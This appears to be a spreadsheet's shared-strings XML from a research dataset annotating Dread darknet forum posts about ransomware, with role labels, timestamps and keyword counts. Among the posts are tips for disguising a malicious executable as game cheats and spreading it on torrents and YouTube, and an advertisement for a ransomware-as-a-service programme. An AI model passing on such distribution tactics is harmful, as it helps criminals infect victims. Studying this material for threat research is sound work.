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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="14841" uniqueCount="5493">
  <si>
    <t>Post No.</t>
  </si>
  <si>
    <t>Content</t>
  </si>
  <si>
    <t>Ransomware Related?</t>
  </si>
  <si>
    <t>About</t>
  </si>
  <si>
    <t>Actor</t>
  </si>
  <si>
    <t>Creator</t>
  </si>
  <si>
    <t>main_thread_bool</t>
  </si>
  <si>
    <t>Post time</t>
  </si>
  <si>
    <t>sub_dread</t>
  </si>
  <si>
    <t>sub_url</t>
  </si>
  <si>
    <t>Title</t>
  </si>
  <si>
    <t># users involved</t>
  </si>
  <si>
    <t># comments in this thread</t>
  </si>
  <si>
    <t>time difference</t>
  </si>
  <si>
    <t>live time (whole thread)</t>
  </si>
  <si>
    <t>hit_keywords</t>
  </si>
  <si>
    <t>How many posts in 1 thread mention ransomware?</t>
  </si>
  <si>
    <t>How many times ransomware is mentioned in 1 post?</t>
  </si>
  <si>
    <t>How many times ransomware was mentioned in the whole thread?</t>
  </si>
  <si>
    <t>there is rarely money in hacking normal poeple, except if you're trying to build some botnet. for example hackers usually buy access to coporate networks from iab (initial access brokers) and deploy ransomware for example. that yields them substantial gains, for relatively little to no work at all.;;;furthermore, why there isn't that much viruses for linux?;actually, gnu/linux viruses are more common than you think. i read report made by huntress that roughly 60% of viruses found in the wild are aimed at linux servers in 2021.;;it really boils down to gain vs time spent.</t>
  </si>
  <si>
    <t>Y</t>
  </si>
  <si>
    <t>making money</t>
  </si>
  <si>
    <t>information (provider)</t>
  </si>
  <si>
    <t>/u/Zian</t>
  </si>
  <si>
    <t>14/09/2021 19:36</t>
  </si>
  <si>
    <t>/d/hacking</t>
  </si>
  <si>
    <t>1d90258486cfdd53ae51</t>
  </si>
  <si>
    <t>"Hacking" normal endusers is so easy, why don't it happen more often?</t>
  </si>
  <si>
    <t>0 days 00:11:00</t>
  </si>
  <si>
    <t>1 days 20:58:00</t>
  </si>
  <si>
    <t>{'ransomware': 1}</t>
  </si>
  <si>
    <t>;i2p network proposed as the next hiding spot for criminal operations;;at least one criminal market has moved from tor to i2p. others asked to do so as well.;;the success of the recent law enforcement operations that have cracked down on criminal services operating on the tor network is now causing a shift in the criminal landscape.;there are now criminally-focused services that are actively moving sites or are being asked by customers to move operations from the tor network to an alternative known as the invisible internet project (i2p).;;;libertas market moves exclusively to i2p;;yesterday, the libertas market, a tor-based portal for selling illegal products, became the first criminal marketplace that permanently abandoned the tor network for i2p.;"the tor network is not suitable for hidden services due to flaws in the network which allow denial of service attacks," administrators of the libertas market wrote on their now-closed tor portal.;;"these flaws allow law enforcement to determine which hidden services are allowed to operate, whether they are legitimate services or sting operations.";;the libertas market administrator referenced the tor network's predisposition for dos attacks as the primary reason for the move. they referenced an unconfirmed tor vulnerability that allows law enforcement to determine a tor site's real-world ip address.;however, similar dos vulnerabilities have also been exploited for other purposes, and not by law enforcement. for example, zdnet reported last month on a wave of distributed denial of service (ddos) attacks that targeted the dream market, empire market, and nightmare market, three of the biggest dark web marketplaces today.;hackers launched ddos attacks and requested ransom payments from the operators of these marketplaces.;;dream market admins cited the ongoing ddos attacks and subsequent extortion attempts (asking for a $400,000 ransom) as the primary reason why they shut down their service at the end of april.;;dream market admins claimed the hackers exploited a supposedly new tor vulnerability to take down tor-hosted websites. however; some dark web researchers say that attacks don't need to be so sophisticated, and not all use this "new" vulnerability. for example, some attacks appear to have used a four-year-old tor ddos tool instead.;;;other marketplaces asked to move to i2p as well;;but long before libertas announced it was moving exclusively to i2p, users of other marketplaces were making similar requests.;;annoyed by the almost non-stop ddos attacks and subsequent downtime, and frightened by the ever-increasing attention to tor sites by law enforcement, multiple users had requested that other marketplaces move their operations to i2p in the previous months.;;there are multiple users on dread, a tor-based reddit-like clone for dark web users, urging administrators of various criminal services to move to i2p alternatives. pleas have been made in topics for the dream market, wall street market, cryptonia, and the empire market.;;;previous i2p push failed;;this is not the first time that there's a general push the customers of criminal marketplaces from tor to i2p. something similar happened in the summer of 2017 when authorities shut down three major tor marketplaces in the span of a few months -- alphabay, hansa market, and ramp.;;panicking and thinking they might be targeted by law enforcement, some users tried to push tor marketplaces toward i2p, to no success. instead, marketplaces continued to operate on tor, while some vendors either set up their own "shops" (personal tor sites) or moved to telegram or discord.;;now, with dream market shutting down, and authorities taking down valhalla and the wall street market, tor users are going through the same phase they went through in 2017.;the last time, things didn't work out because tor-based markets didn't see the benefit of moving to i2p, an anonymity network with far fewer users than tor -- and mostly considered a "ghost town.";;however, due to the recent ddos extortions that have recently hit marketplaces, there are incentives on both sides of the aisle -- for both site users and administrators.;the general idea right now is that tor is neither safe or stable enough to host crime-focused portals anymore.;;i2p fans hope that with major markets moving to i2p, users will follow, and the move to i2p will put law enforcement behind the eight ball again when it comes to investigating i2p networks, giving vendors and customers an edge once again.;the problem now remains i2p itself, which is notoriously difficult to install and get running correctly, something that several tor users have pointed out in recent dread discussions.</t>
  </si>
  <si>
    <t>/u/prosandconspiracy</t>
  </si>
  <si>
    <t>31/05/2019 10:34</t>
  </si>
  <si>
    <t>/d/DarkNetMarkets</t>
  </si>
  <si>
    <t>b970aae3f6275603ca2a</t>
  </si>
  <si>
    <t>"I2P network proposed as the next hiding spot for criminal operations" - ZDNet</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>2 days 02:52:00</t>
  </si>
  <si>
    <t>{'extortion': 1}</t>
  </si>
  <si>
    <t>not really, it all means entirely different things to different people.;;take the obvious word 'hacker'. to me and pretty much everyone i work with a hacker is a noun used to describe someone who is expert at looking at something complex and adding functionality to make it better. like a guy who looks at a softcore processor unit like a xilinx microblaze, realizes that when his code is compiled that a single simple bitwise manipulation takes 4 cycles not 1 as there's no opcode that does that in silicon but there is silicon for something similar and the addition of two diodes in the die gives an opcode that does it, improving performance by perhaps 20% without any negative consequence like additional heat. it's like god level technologist, and a compliment.;;it's also used as a verb or adjective, 'i hacked up a proof of concept and it works but it's hacky as fuck code and needs formalized before we merge to trunk'.;;it never means someone who stalks some chick on social media using a simple sherlock script or messes with webcams etc. the media use it for that, and corporate pr people mirror the language. movies do and kids follow trying to be cool i guess.;;most chat isn't lingo, it either is the correct use of something technical, or a temporary name given to something by the discovery team who found a links, like the guys who likely fucked sony over that nk comedy film and likely released the wannacry ransomware along with other high profile breaches. different security firms call them different names.;;some old habits still knock around, if someone shouts can you throw them the camel book they mean the o'reilly bible of perl book iirc called 'programming perl' but all o'reilly books have a line etching of an animal on the cover.;;recaf if you're doing the coffee run usually refers to making a mug of coffee using instant freeze dried topped with filter coffee from the pot with amphetamine added and sugar to mask the taste.;;script-kiddie still gets used to insult people a lot but has less bite as almost all pentesters or crackers today rely on github scripts and preconf distros so is a bit meaningless.;;that's about it i think. even on the old but active bbs you see abbreviations like skt for socket but it's not slang, just someone typing fast in context.;;it's not a fringe area like it used to be, it security is a mainstream boring job these days, the slang is mostly dead outside of periodicals like 2600.;;oricand.;;s'mesc.</t>
  </si>
  <si>
    <t>discusing ransomware lingo</t>
  </si>
  <si>
    <t>education (provider)</t>
  </si>
  <si>
    <t>/u/oricand</t>
  </si>
  <si>
    <t>22/08/2021 07:20</t>
  </si>
  <si>
    <t>ef2c0d419c5fb6e793f7</t>
  </si>
  <si>
    <t>"hacker terminology/lingo"</t>
  </si>
  <si>
    <t>0 days 00:57:00</t>
  </si>
  <si>
    <t>0 days 14:02:00</t>
  </si>
  <si>
    <t>is it just me or is the entire carding scene kinda cringe;;you wouldnt expect anyone to think youre sophisticated or skilled if you say "ive made 2mil committing cc fraud" , theyll just stop hanging with you and maybe start checking for skimmers;;but people woluld defintly think youre cool and dangerous if you say something like "i develop ransomware and just made 2mil off of it". this gives off a powerfull and mysterious vibe;;carding just sounds lame and cringe. i stopped carding not because i wasent making enough, for me it was just embarresing , id lose my reputation if soemone found out. i littrelly coulnt look myself in the mirror knwoing i was considered a carder, and i also coulnd go to therepy or tell someone how i was feeling. it was emotional and mental torture for me.;;also the fact that it is too easy makes it even more uncool. you can just read bailopan/ ginseng and known more than enough.;;of course there are acceptions, such as ginseng and bailopan since they have dedicated a substancial amount   of  time and effort in order to master the art of carding and have revolutionized it to a great degree , they are the only carders i will ever respect. it is very however unlikely that youre goign to be the next bailopan.;;please stop. i get second hand embarrassment. its pathetic;;also this is just my personal opinion, im not saying this to get you worked up, thats up to you.</t>
  </si>
  <si>
    <t>discussing the reputation/prestigue of ransomware vs carding</t>
  </si>
  <si>
    <t>debate</t>
  </si>
  <si>
    <t>/u/FyodorD</t>
  </si>
  <si>
    <t>29/05/2022 19:19</t>
  </si>
  <si>
    <t>/d/Carding</t>
  </si>
  <si>
    <t>7136d0262065f0a595db</t>
  </si>
  <si>
    <t>(Contriversil opinon) Carding is kinda cringe</t>
  </si>
  <si>
    <t>5 days 16:05:00</t>
  </si>
  <si>
    <t>hello everyone!;;i was asking myself on how to spread a file / virus across the internet? and how to have people download &amp; run my program?;;i'm also asking how did for example the "wanna cry" virus spread in so many computers? i just don't understand, if anyone of you could help me with this, it would be really nice!;;with this, have a wonderful day / evening!</t>
  </si>
  <si>
    <t>asking for ransomware advice</t>
  </si>
  <si>
    <t>education (request) / potential hacker (individual)</t>
  </si>
  <si>
    <t>/u/Bone667</t>
  </si>
  <si>
    <t>27/11/2020 00:51</t>
  </si>
  <si>
    <t>aa42f73ca201fe4a6a18</t>
  </si>
  <si>
    <t>(HELP) Trying to spread a file!</t>
  </si>
  <si>
    <t>1 days 21:11:00</t>
  </si>
  <si>
    <t>{}</t>
  </si>
  <si>
    <t>wannacry got as big as it did because it was a wormable exploit. once you have your initial access inside a network (by phishing mails, malicious ads, fake website or whatever) - it would easily spread to other computers in the network. such exploits are very rare, and even more rare that the exploit is leaked before a fix is available.;;in reality, most targeted hacks happen with spear phishing on a specific target and using exploits that apply for your target. after initial access, you need to do recon on the network and find things to exploit. often this is done manually, but attackers will have a large amount of scripts and exploits in their toolbox to make this easier.</t>
  </si>
  <si>
    <t>responding to ransomware advice in previous thread</t>
  </si>
  <si>
    <t>/u/elcamino</t>
  </si>
  <si>
    <t>27/11/2020 15:15</t>
  </si>
  <si>
    <t>0 days 07:44:00</t>
  </si>
  <si>
    <t>lol there is no exploit as wormable exploit.;;it made use of eternal blue smb(server message block). all ransomwares have a worm embedded in them which allows them to replicate.;;wanna cry could spread through the same network and through site redirects.</t>
  </si>
  <si>
    <t>/u/L3VITRON</t>
  </si>
  <si>
    <t>27/11/2020 20:21</t>
  </si>
  <si>
    <t>0 days 05:06:00</t>
  </si>
  <si>
    <t>you can just shove your scripted .exe under the diguise of cheats (for cs go , fortnite or any game), or a super-duper of a new program, for something(better if you say that it's a free beta test for a rat/keylogger).;;in addition, you can ask a person to combine your virus with this program(maybe his rat which has been sold some units), then it turns out that our .exe will not cause any suspicions and.;;you can distribute it  on youtube, on torrents, in forums, on warez boards.;;;if you want me to write a guide on cleaning tools(removing malware from tools ) i'll write it.</t>
  </si>
  <si>
    <t>27/11/2020 20:25</t>
  </si>
  <si>
    <t>0 days 00:04:00</t>
  </si>
  <si>
    <t>clearnet link:    https://www.wired.com/story/monero-privacy/;;tl;dr:  propaganda or are we all fucked?;;;]as discerning dark web drug dealers and pseudonymous hackers have figured that bitcoin is not magically private money, many have turned to monero, a digital coin that promises a far higher degree of anonymity and untraceability baked into its design. but one group of researchers has found that monero's privacy protections, while better than bitcoin's, still aren���t the cloak of invisibility they might seem.;;monero is designed to mix up any given m"coin" with other payments, so that anyone scouring monero's blockchain can't link it to any particular identity or previous transaction from the same source. but in a recent paper, a team of researchers from a broad collection of institutions���including princeton, carnegie mellon, boston university, mit, and the university of illinois at urbana-champaign���point to flaws in that mixing that make it possible to nonetheless extract individual transactions.;;that shouldn���t just worry anyone trying to stealthily spend monero today. it also means evidence of earlier not-quite-untraceable payments remain carved into monero���s blockchain for years to come, visible for any snoop that cares to look.;;those privacy flaws were especially acute before a change to monero's code in february of 2017, the researchers note. but transactions before that time remain dangerously identifiable, and even payments after that change may be easier to identify than monero's privacy-sensi"the mental model that people have today for monero is a simplistic one, that these transactions are private. that model is just incorrect," says andrew miller, a researcher at the university of illinois at urbana-champaign who worked on the paper. "there's information that���s revealed and not covered up by monero's cryptog";;the researchers' paper, which will be presented at the privacy enhancing technologies symposium in july, takes special note of a period starting in july 2016, when monero was first adopted as an alternative to bitcoin by the then-largestdark web black market for drugs, alphabay, and ending in february 2017, when monero completed an upgrade to its privacy protections known as ring confidential transactions. roughly 200,000 monero transactions occurred during that period, the researchers point out, many of which likely involved purchases of illegal narcotics or other sensitive payments made by users who believed their payments were fully untraceable.;;"people took the privacy guarantees of the currency at face value," says nicolas christin, a dark web focused researcher who contributed to the paper. "all indications show people were really using this forcontributed to the paper. "all indications show people were really using this for applications where they needed privacy. and those transactions were very, very vulnerable.";;;not so stealthy;;despite bitcoin's widespread use on the dark web and for other illicit applications like ransomware, scofflaws have become increasingly aware that if they're not ultra-careful in how they use it, the bitcoin blockchain can help identify them���just as it helped connect the dark web drug market silk road's fortune to the laptop of its creator ross ulbricht, and even helped to track down the servers of another dark web marketplace, hansa. as a result, the online underground has increasingly switched to monero.;;but researchers now point to two distinct cracks in monero's untraceability, one of which was fixed in its early 2017 revamp, and one that still lingers today, even as monero coders have taken steps to fix it. both problems relate to how monero hides the source of a payment, essentially by mixing the coin someone spends with a sampling of other coins used as decoys kno"mixins.";;the researchers first note that simple tricks allow an observer to identify some of the decoy mixins used to cover for a real coin being spent. in monero's first year, for instance, it allowed users to opt out of its privacy protections and spend coins with no mixins at all. (today, monero requires a minimum of four mixin decoys for every transaction.) the problem with that opt-out system: when an already spent and identified coin is later as a mixin, it can be easily plucked out of the mix to help identify the remaining coins. if that results in another coin being identified, and that coin is itself used as a mixin in a subsequent transaction, it can reduce the stealth of those later transactions, too.;;the researchers also found a second problem in monero's untraceability system tied to the timing of transactions. in any mix of one real coin and a set of fake coins bundled up in a transaction, the real one is very likely to have been the most recent coin to have moved prior to that transaction. before a recent change from monero's developers, that timing analysis correctly identified the real coin more than 90 percent of the time, virtually nullifying monero's privacy safeguards. after that change to how monero chooses its mixins, that trick now can spot the real coin just 45 percent of the time���but still narrows down the real coin to about two possibilities, far fewer than most monero users would like.;;;indelible fingerprints;;it's important to note that all of this only helps a snoop identify the spender of a coin, not its recipient, since monero hides recipients' addresses with another technique c"stealth addresses." but if, as just one example, someone were to make as just one example, someone were to make a payment to a monero exchange that knew their identity, and then later to an undercover cop posing as a drug dealer on the dark web, that second payment could be tied to the first, and thus to their identity. that threat becomes even more tangible given that alphabay was shut down and its servers seized last summer, potentially helping cops to identify the recipients of thousands of transactions during the seven months during which alphabay accepted monero in its most traceable form. "anyone who expected privacy at that point is still susceptible to being tracked down," says miller.;;when wired reached out to monero core developer and spokeperson riccardo spagni, he responded to the paper's findings by pointing out that monero's stealth addresses and ring confidential transactions do limit which transactions can be traced. he also says that monero's developers have been aware of the problems the researchers point out for years, and have made periodic and ongoing improvements to monero's protocols designed to shore up its privacy shortcomings. "privacy isn���t a thing you achieve, it���s a constant cat-and-m" spagni says.;;on the issue of identifying coins based on analyzing the timing of transactions, however, spagni admits there's no simple solution. "there are steps we can take to continue to improve the sampling, but the reality is that this isn���t a solvable problem by just pecking away " he says. "we need to have a better scheme that allows us to sample a much bigger set [of coins]." but he also notes that the larger the set of decoy coins in every transaction, the more storage monero requires on users' computers and the longer its transactions take. "we're trying to find the balance," he says.;;all of which means monero may continue to leak small amounts of information that could be used to point to likely spenders���even if not providing a smoking gun. even so, the researchers warn that small information leaks can build up over time, and can be combined with other data sources to provide that more concrete evidence.;;perhaps more disturbingly for monero users who spent coins before its privacy improvements, indelible fingerprints could lead to their front door. and that points to a more fundamental problem for cryptocurrencies offering privacy: any security flaw discovered in the future might apply retroactively, allowing observers to dig up old skeletons buried in the currency's blockch"you have a permanent record of everything taking place. if, down the road, someone finds a vulnerability that can reveal what happened in the past, you may still be at risk," says carnegie mellon's christin. "we don���t know what the future "</t>
  </si>
  <si>
    <t>news article on monero(related to ransomware)</t>
  </si>
  <si>
    <t>news</t>
  </si>
  <si>
    <t>/u/LyinEyes</t>
  </si>
  <si>
    <t>27/03/2018 17:30</t>
  </si>
  <si>
    <t>d3227076a7cedea8</t>
  </si>
  <si>
    <t>(Media is coming after Monero now)  "The Dark Web's Favorite Currency is Less Untraceable Than it Seems    x-post /d/Crypto</t>
  </si>
  <si>
    <t>0 days 21:23:00</t>
  </si>
  <si>
    <t>we do not allow ransomware on dread</t>
  </si>
  <si>
    <t>notifiying that ransomware is not allowed on dread</t>
  </si>
  <si>
    <t>information (moderator)</t>
  </si>
  <si>
    <t>/u/Solar</t>
  </si>
  <si>
    <t>30/08/2022 19:41</t>
  </si>
  <si>
    <t>/d/malware</t>
  </si>
  <si>
    <t>1857706cbfe744882dcc</t>
  </si>
  <si>
    <t>- BlackSnake Ransomware -</t>
  </si>
  <si>
    <t>0 days 02:16:00</t>
  </si>
  <si>
    <t>2 days 00:23:00</t>
  </si>
  <si>
    <t>brothers am in trouble. i got hit by some ransomware called kiratos. anyone with how i can decrypt the file?</t>
  </si>
  <si>
    <t>asking how to decrypt ransomware he was infected with</t>
  </si>
  <si>
    <t>education (request)</t>
  </si>
  <si>
    <t>/u/ThuugBerzerk</t>
  </si>
  <si>
    <t>28/04/2020 20:15</t>
  </si>
  <si>
    <t>53cd4e1072942cad4dfe</t>
  </si>
  <si>
    <t>.kiratos ransomware</t>
  </si>
  <si>
    <t>0 days 00:15:00</t>
  </si>
  <si>
    <t>if it's coded half decently, it'll be encrypting files so that only the person sending the ransomware can unlock it, probably using a password that if they're smart enough will be impossible to bruteforce.</t>
  </si>
  <si>
    <t>providing advice to ransomware victim</t>
  </si>
  <si>
    <t>/u/ALaMuerte99</t>
  </si>
  <si>
    <t>28/04/2020 20:19</t>
  </si>
  <si>
    <t>hello everyone,;;i opened a new sub that's dedicated to ransomware -;/d/ransomware;.;feel free to join in, if you're interested.</t>
  </si>
  <si>
    <t>advertising new ransomware thread</t>
  </si>
  <si>
    <t>other</t>
  </si>
  <si>
    <t>/u/Cerebrate</t>
  </si>
  <si>
    <t>30/11/2021 13:50</t>
  </si>
  <si>
    <t>/d/SubAnnouncements</t>
  </si>
  <si>
    <t>f5e90a95470697790bbe</t>
  </si>
  <si>
    <t>/d/Ransomware</t>
  </si>
  <si>
    <t>0 days 07:00:00</t>
  </si>
  <si>
    <t>make it clickable by putting the name of the sub in the body, like this:;/d/ransomware</t>
  </si>
  <si>
    <t>/u/samwhiskey</t>
  </si>
  <si>
    <t>30/11/2021 17:04</t>
  </si>
  <si>
    <t>0 days 03:14:00</t>
  </si>
  <si>
    <t>hello everyone,;;i declare my ransomware project open for business.;feature list, downloads and guide have been published on the subdread.;;for everyone looking for a decent ransomware, i recommend them trying my project, the fee is only 20% and everyone is welcome to use it :);;figured i'd post it here, since it isn't paid content/service by default and tbh it's hacking related.</t>
  </si>
  <si>
    <t>advertising new ransomware strain</t>
  </si>
  <si>
    <t>raas provider (individual)</t>
  </si>
  <si>
    <t>25/05/2021 23:00</t>
  </si>
  <si>
    <t>01f0793d1c45c833846c</t>
  </si>
  <si>
    <t>/d/Redeemer - Open Ransomware Programme</t>
  </si>
  <si>
    <t>5 days 22:51:00</t>
  </si>
  <si>
    <t>;;/d/redeemer - open ransomware programme;;by;/u/cerebrate;���;1 year ago;in;/d/hacking;;4 points;���;</t>
  </si>
  <si>
    <t>27/05/2021 19:11</t>
  </si>
  <si>
    <t>1a12d01f93ada7b5ac55</t>
  </si>
  <si>
    <t>0 days 00:00:00</t>
  </si>
  <si>
    <t>you can hit me up here, i don't use anything else other than dread because of privacy concerns.</t>
  </si>
  <si>
    <t>buying ransomware</t>
  </si>
  <si>
    <t>potential hacker (individual)</t>
  </si>
  <si>
    <t>27/05/2021 23:46</t>
  </si>
  <si>
    <t>0 days 00:32:00</t>
  </si>
  <si>
    <t>wanna work together? msg me</t>
  </si>
  <si>
    <t>offering work</t>
  </si>
  <si>
    <t>/u/hoggaes</t>
  </si>
  <si>
    <t>29/05/2021 02:11</t>
  </si>
  <si>
    <t>0 days 12:13:00</t>
  </si>
  <si>
    <t>/u/askpepsi;thanks for the review.  the picture links work now.  these days system security is very important as recent ransomware attacks mentioned in the news revealed. my shields are up and your links previously popped as containing a trojan. i am no it guy so i let my software do the work.</t>
  </si>
  <si>
    <t>user thanking for a review and expressing the increase in ransomware</t>
  </si>
  <si>
    <t>/u/newbieforever2018</t>
  </si>
  <si>
    <t>/d/Xanax</t>
  </si>
  <si>
    <t>4199f38f0d494e5be21a</t>
  </si>
  <si>
    <t>/u/xanswer review Legend.</t>
  </si>
  <si>
    <t>0 days 00:50:00</t>
  </si>
  <si>
    <t>4 days 06:57:00</t>
  </si>
  <si>
    <t>racketeering laws;;rico defines a wide variety of criminal activities based upon an organization���s status as one that derives income from criminal offenses. individuals cannot acquire, establish, or operate any enterprise with illegally derived income, acquire or maintain any interest or control of any enterprise through illegal activity, or use any enterprise to commit illegal acts. these laws help federal prosecutors to pursue charges against high-level organized crime figures who might otherwise be able to distance themselves from a variety of charges through an appearance of plausible deniability.;racketeering crimes &amp; charges;;although state laws may prohibit individual aspects of criminal enterprises, federal rico laws provide the legal force to ���bust up��� criminal empires that stretch across multiple jurisdictions. extortion, blackmail, and bribery are three common federal offenses that can cause otherwise lawful organizations to fall under the provision of the rico act. criminalns are frequently subject to scrutiny and eventual prosecution on the basis of rico.;;any enterprise that derives any of its income through illegal activity may be subject to additional penalties under rico. these can include such things as gambling houses, brothels, and so on.;otherwise legal organizations that derive some portion of their income through illicit activities may be subject to rico. for example, a bar with a valid liquor license that provides the cover for illegal gambling or for the planning of unlawful activities may be subject.;organizations that are used for the purposes of ���laundering��� money, even if the majority of participants are unaware of the organization���s criminal connections, may fall under the dominion of rico. for example, general contractors, waste removal companies and other firms that have sometimes been used to launder ���dirty��� money may be shut down, have assets seized, or be liquidated in favor of lawful owners.;;racketeering punishmenor numerous punishments. imprisonment for rico-related activities is not to exceed twenty years, and the individual faces forfeiture of property that was obtained through illicit means. an individual fined under rico may generally not be fined more than twice the proceeds from their illicit activities.;racketeering sentencing guidelines;;racketeering sentencing guidelines are extremely strict. although general racketeering statutes provide for maximum imprisonment of up to twenty years, a life sentence is possible if any of the underlying racketeering activities provide for a life sentence. likewise, in the event that property obtained through illicit means cannot be located, courts can order the forfeiture of any of the defendant���s other properties.;racketeering statute of limitations;;title 18 of the united states code, section 3282, provides that no person may be brought to trial, prosecuted or punished for any non-capital offense unless they are indicted or information is filed within five years. important to note that some criminal activities that might be connected with racketeering may not be protected by the short statute of limitations provided by title 18.;;;regards</t>
  </si>
  <si>
    <t>news article on criminal laws (including ransomware)</t>
  </si>
  <si>
    <t>/u/JACKJACK</t>
  </si>
  <si>
    <t>/d/KnowYourRights</t>
  </si>
  <si>
    <t>22e31a6ecc430bbe6eb0</t>
  </si>
  <si>
    <t>1) Rico Law s&amp; Punishments USA</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;stolen account credentials are easy to find if you know where to look, and logins for streaming services are among the most popular options for dark web buyers.;;streaming logins can be sold for dirt cheap. and you can buy almost all of a person���s digital life on the dark web for less than $2,000. tap or click here to see how much your accounts and data can sell for. a notorious group of hackers recently shared a list of stolen credentials from one of the most popular free tv services on the web. if you���ve used the same password on this site since 2018, now���s the time to change it.;;[/b]shinyhunters are back in business[/b];;shinyhunters are a hacking collective responsible for several high-profile data breaches. the group has sold and shared login information from hundreds of millions of people on dark web marketplaces while making tons of money along the way. their latest target appears to be none other than pluto tv, a free streaming video service users as of august 2020.;;according to bleepingcomputer, the hackers shared a database containing 3.2 million records on a dark web forum. pluto tv does not ask for any payment information, but the leaked account data includes usernames, email addresses, hashed passwords, birthdays and ip addresses.;;this data is more than enough for enterprising scammers to send off phishing emails or extortion scams without too much effort. the data doesn���t appear to be new, with the latest entry dating back to 2018, but pluto tv confirmed that the email addresses in a database sample are from actual users. the company has not explicitly confirmed the breach yet.;;if the breach���s data is genuine, it���s safe to assume that shinyhunters are telling the truth. pluto tv users who opened accounts in 2018 and earlier should immediately reset their passwords to prevent their data from falling int</t>
  </si>
  <si>
    <t>news article on extortion</t>
  </si>
  <si>
    <t>/u/DeepWebFeed</t>
  </si>
  <si>
    <t>18/11/2020 20:32</t>
  </si>
  <si>
    <t>/d/DeepWebFeed</t>
  </si>
  <si>
    <t>d0a1e85ed59d78135037</t>
  </si>
  <si>
    <t>3.2 Million Records From Free TV Site Leaked on The Dark Web</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;the myths, security scares and news about numerous incidents of fraud and illegal activities on the deep web are sure to make anyone think twice about going there. firstly, it���s imperative to know what the deep web really is ���  essentially it refers to a section of the internet that is not found in search engine indexes.;;and there���s a further division of the deep web, a rather darker part of it, which is called the dark web. it can only be accessed through designated software or with the knowledge of the protocols that open the access to it. what makes it secure and ananymous is the fact that the user���s identity is cloaked; hence, the anonymity makes it difficult to learn about the identity of the person on the other side of the screen.;;technology opens up many opportunities for businesses; the internet, in particular, has grown significantly. while the internet creates opportunity and facilitates growth, it can also create risks for businesve drastically increased as more and more bad actors take advantage of turbulent times, creating immense pressure on cybersecurity firms worldwide. experts suggest that dark web activity has increased 300% in the last 3 years. there are unsurprsingly an awful lot of myths about the deep web, it won���t be wrong to say that it���s not an extremely secure platform altogether. without further ado, we present you the some not-so-fun facts about the deep web that will make you more careful about your online security:;;;anonymity;;by the use of the tor web browser, an anonymous connection is established, which not only connects you to the deep web but also keeps your identity concealed thus protecting you from threats. however, even though the dark web is infamous for all the dark activities that take place there, bear in mind that not every activity happening there is illegal or criminal in its ways. that being said, as compared to the rest of the web, it goes without saying that criminals would alwaysace safer and a reliable option for discussion as compared to the rest of the internet.;;since the sites are not indexed, it is next to impossible to establish a link and catch someone committing the crime or indulging in an illegal activity. tracing on the deep web cannot be done, which makes criminals of all kinds very active on it.;;;breeding ground for criminal activity;;the virtually untraceable nature of the deep web makes it an ideal place for cybercriminal activity. many people have even called the deep web the black market of the internet. malicious links and websites can leak or trade your personal information to strangers or hackers around the world, regardless of whether you are on the deep web or not.;;;marketplace for ransomware;;most businesses run the risk of not even knowing when cyberattacks are coming.;;thanks to the dark web, they���re always under threat of malware infections, targeted hacking attempts and all the other kind of potential threats which dark web has at its disposal. rare is still amongst the top security threats to firms all across the world and can also be easily bought and sold on the deep web.;;;credit card information for sale;;a robust market for primary account numbers (pans), bank identification numbers (bins), and card data exists on the deep web. it is considered to be an insecure platform; considering this fact it is highly recommended by experts to avoid making any kind of payments using the deep web. retailers and companies that accept credit cards have been highly concerned about it.;;;employee username and password data;;this is probably not the first time (sadly, also not the last time) you���re reading about how the sensitive information (like username, passwords) of millions of users could be purchased on the dark web. just like way tech services are sold on the usual internet that we access every day, dark web also presents unique services that are exclusively found there. hackers offer haas (hacking as a service), which allows their customers to eaccess databases and other organizational systems or assets���quite obviously, illegally.;;;how to keep your business safe?;;the internet security software industry has no choice but to cope with the pace at which this malicious side of the web is growing. keeping up with evolving cybercrimes needs innovative technologies that predict, prevent, detect and remediate the most sophisticated cyber-threats. even though nothing can guarantee 100% safety against the malice the dark part of the internet has at its disposal, having a shield of security would at least protect a person or company against most of the dangers the dark web could pose.;;developing an understanding of the most likely threat scenarios and acting accordingly is of utmost importance too. for every modern person on the internet, it is essential to invest in cybersecurity and protect your online privacy like a pro.;;;final thoughts;;the dangers of the dark web spare no organisations���whatever their size may be. while there may not be about cybersecurity, it is something that cannot be undermined by any person or business. prevention never hurts; one should rather be safe than sorry.</t>
  </si>
  <si>
    <t xml:space="preserve">news article on issues in the deep web that should make you careful about online security </t>
  </si>
  <si>
    <t>23/02/2021 16:17</t>
  </si>
  <si>
    <t>55cc76f367854e621f32</t>
  </si>
  <si>
    <t>5 Things About The Deep Web That Should Make You More Careful About Online Security</t>
  </si>
  <si>
    <t>23/02/2021 16:27</t>
  </si>
  <si>
    <t>ea8f39778f06b08a86be</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;ransom demands rose 31 percent from q2 to q3 2020, with an average of $234,000, while hackers threaten victims with extortion using exfiltrated data in nearly 50 percent of ransomware attacks. threat actors are increasing threats to breach victims through extortion attempts, as data exfiltration now occurs in nearly 50 percent of ransomware attacks. meanwhile, ransom payments rose 31 percent in the last quarter, at an average of $234,000, according to the coveware quarterly ransomware report.;;the medium ransom payment averages $110,532. researchers explained payment costs have increased, as hackers increasingly target larger enterprises and ���large, big game payments continue to drag the averages up.��� improperly secured remote desktop protocol (rdp) continues to be the primary vulnerability exploited by these attackers. the number of compromised rdp credentials has drastically increased in recent months, spurring a decrease in the price of dark web postings.;ails and vulnerability exploits are the other leading footholds used by ransomware hackers to gain access to a network. hackers leverage these exploits to gain access to escalated privileges. once they���ve obtained admin privileges, the company is then fully compromised, with data exfiltration and ransomware transpiring within hours or days.  ���defending against ransomware that begins with email phishing or a cve requires more nuanced and in-depth defense,��� researchers noted.;;extortion techniques also continue to find success, as hackers have realized the same tactics and procedures used to successfully target smaller companies are just as effective at companies with thousands of employees, researchers explained.  and though the rise implies attacks are increasing in sophistication, coveware does not believe that���s the case.;;���the biggest change over the past six quarters is threat actors now realize that their tactics scale to much larger enterprises without much of an g costs,��� researchers wrote. ���the profit margins are extremely high, and the risk is low.���;;���this problem will continue to get worse until pressure is applied to the unit economics of this illicit industry,��� he added. ���it is also possible that the influx of remote and work-from-home setups using rdp and other remote technologies allowed threat actors to leverage attack vectors that previously didn���t exist.���;;the sodinokibi variant led the pack with 16.2 percent of the market share, followed by maze with 13.6 percent. however, the notorious threat actors have since closed their operations. maze was the first group to popularize the double extortion attack method, which has pummeled the healthcare sector for more than a year. according to the research, it appears 